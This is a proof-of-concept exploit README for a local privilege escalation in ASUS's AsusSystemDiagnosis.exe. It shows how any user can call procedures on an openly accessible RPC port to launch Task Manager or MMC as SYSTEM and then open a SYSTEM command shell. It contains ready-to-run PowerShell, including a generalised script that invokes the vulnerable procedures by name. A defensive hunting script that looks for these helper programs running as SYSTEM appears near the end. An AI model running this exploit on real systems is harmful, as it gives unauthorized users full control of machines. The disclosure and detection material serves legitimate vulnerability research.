Privilege Escalation - AsusSystemDiagnosis.exe - Proc39()
Full Path: C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_d385bdc0d33d66f9\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe
Issue:
The ALPC port \RPC Control\ASHWTestServer, exposed by AsusSystemDiagnosis.exe, is fully accessible to any user (see the port's permissions in ALPC_Port_Permissions.PNG), so a low-privileged caller can connect to it and issue RPC calls. Calling Proc39() over RPC through this port spawns a taskmgr.exe process as SYSTEM in the calling user's interactive session, i.e. a GUI running with SYSTEM privileges on the user's desktop.
Exploitation:
Using Project Zero's NtObjectManager PowerShell module from https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools (take the compiled release rather than building from source), connect to the exposed RPC interface and call Proc39(). Once the SYSTEM taskmgr.exe process is running, a cmd.exe shell can be started from it via the File menu: File > Run new task > cmd.exe. Because the new process is created by the SYSTEM Task Manager, the resulting shell also runs as SYSTEM.
NtObjectManager:
Import-Module NtObjectManager
# Parse the RPC interface the binary registers from its embedded NDR data
$server = Get-RpcServer C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_d385bdc0d33d66f9\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe
# Generate a client for that interface and bind to the port
$client = Get-RpcClient $server
$client.Connect()
# Proc39() takes no arguments; the server spawns taskmgr.exe as SYSTEM
$client.Proc39()
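The same steps driven end to end from one script, as an added example that is not part of the original PoC: it imports the module, parses every RPC interface the binary registers (a binary can carry more than one), keeps the interface whose procedure list contains the requested name, prints that procedure's line from the reconstructed IDL so the lack of parameters is visible, and then invokes it. Assumptions: NtObjectManager is installed as a PowerShell module (Install-Module NtObjectManager from the PowerShell Gallery is the usual route), the binary sits at the path given above, and, as in the PoC, Connect() without arguments can resolve the endpoint. $ProcName can be switched to Proc40, Proc53 or Proc54, which are called the same way.

```powershell
# Added example, not the PoC's own code. Assumes the NtObjectManager module is
# installed and that AsusSystemDiagnosis.exe is at the path from this advisory.
param(
    [string]$BinaryPath = 'C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_d385bdc0d33d66f9\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe',
    [string]$ProcName   = 'Proc39'   # Proc40, Proc53 and Proc54 are invoked the same way
)

Import-Module NtObjectManager -ErrorAction Stop

# Parse all RPC interfaces in the binary and keep the one that exposes $ProcName.
$servers = @(Get-RpcServer $BinaryPath)
$server  = $servers | Where-Object { $_.Procedures.Name -contains $ProcName } | Select-Object -First 1
if (-not $server) {
    throw ("{0} not found; interfaces parsed: {1}" -f $ProcName, ($servers.InterfaceId -join ', '))
}

"Interface {0} v{1} with {2} procedures" -f $server.InterfaceId, $server.InterfaceVersion, $server.Procedures.Count

# Format-RpcServer emits the reconstructed IDL; show only the line for our
# procedure so it is obvious that the call takes no parameters.
(Format-RpcServer $server) -split '\r?\n' | Select-String -Pattern "\b$ProcName\b"

# Generate a client for the parsed interface, bind to the port, call the
# procedure by name and release the binding afterwards.
$client = Get-RpcClient $server
try {
    $client.Connect()                 # endpoint resolved without arguments, as in the PoC
    $result = $client.$ProcName()     # dynamic member invocation: $ProcName holds the method name
    "{0}() returned {1}; look for the new SYSTEM child process in this session" -f $ProcName, $result
}
finally {
    $client.Dispose()
}
```

The script prints whatever the procedure returns (the PoC does not document the return type, so it is shown as-is); the interesting effect is the child process, not the return value.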
Privilege Escalation - AsusSystemDiagnosis.exe - Proc40()
Same as above, but Proc40() spawns mmc.exe as SYSTEM. From that console either create a new task or use the browse dialog to open an explorer.exe window and run cmd.exe from its address bar; either way the shell is a child of the SYSTEM mmc.exe and runs as SYSTEM.
Additional Notes:
Proc53() - spawns systemreset.exe as SYSTEM
Proc54() - spawns RecoveryDrive.exe as SYSTEM
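A hunt for the post-exploitation state this page describes, as an added example that is not part of the PoC: any of the four helper programs the exposed procedures launch (taskmgr.exe, mmc.exe, systemreset.exe, RecoveryDrive.exe) running as SYSTEM in an interactive, non-zero session. It uses only Win32_Process via CIM. The parent-name check is an assumption, that the helper is launched directly by AsusSystemDiagnosis.exe, and is therefore reported as a flag rather than used as a filter.

```powershell
# Added example, not part of the original PoC. Process names come from this
# README; the parent-is-AsusSystemDiagnosis check is an assumption and only
# annotates the result.
$Spawned = 'taskmgr.exe', 'mmc.exe', 'systemreset.exe', 'RecoveryDrive.exe'

function Get-SuspectSystemSessionProcess {
    $all   = Get-CimInstance Win32_Process
    $byPid = @{}
    foreach ($p in $all) { $byPid[$p.ProcessId] = $p }

    foreach ($p in $all) {
        if ($Spawned -notcontains $p.Name) { continue }
        if ($p.SessionId -eq 0) { continue }          # session 0 is where SYSTEM services normally run
        $owner = Invoke-CimMethod -InputObject $p -MethodName GetOwner
        if ($owner.ReturnValue -ne 0) { continue }     # owner unreadable (e.g. access denied); skip
        if ($owner.User -ne 'SYSTEM') { continue }     # comparison is case-insensitive in PowerShell
        $parent = $byPid[$p.ParentProcessId]
        [pscustomobject]@{
            Name       = $p.Name
            ProcessId  = $p.ProcessId
            SessionId  = $p.SessionId
            Owner      = "$($owner.Domain)\$($owner.User)"
            Parent     = if ($parent) { $parent.Name } else { '<exited>' }
            ParentPid  = $p.ParentProcessId
            # assumption: the helper is a direct child of the diagnosis binary
            LikelyAsus = [bool]($parent -and $parent.Name -ieq 'AsusSystemDiagnosis.exe')
        }
    }
}

Get-SuspectSystemSessionProcess | Format-Table -AutoSize
```

Treat a hit as a lead, not a verdict: an administrator who deliberately starts a tool as SYSTEM in their own session (for example with PsExec -s -i) produces the same picture. Reading the owner of a SYSTEM process from an unprivileged shell can fail with access denied, which the function skips silently, so run the hunt with administrative rights for complete coverage.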
[4.0K] /data/pocs/a34298b58a8ace4eea9e6a7194b6bc5170aa0564
├── [615K] AsusSystemDiagnosis.exe
├── [4.0K] Proc39
│ ├── [ 19K] ALPC_Port_Permissions.PNG
│ ├── [ 54K] NtObjectManager_RPC_Call_2.PNG
│ ├── [ 26K] NtObjectManager_RPC_Call.PNG
│ ├── [ 34K] system_shell.PNG
│ ├── [ 97K] task_manager_1.PNG
│ └── [ 92K] task_manager_2.PNG
├── [4.0K] Proc40
│ ├── [6.0K] mmc_system.PNG
│ ├── [ 68K] proc40_rpc_call.PNG
│ ├── [135K] spawning_shell.PNG
│ └── [ 99K] system_shell.PNG
└── [1.4K] README.md
2 directories, 12 files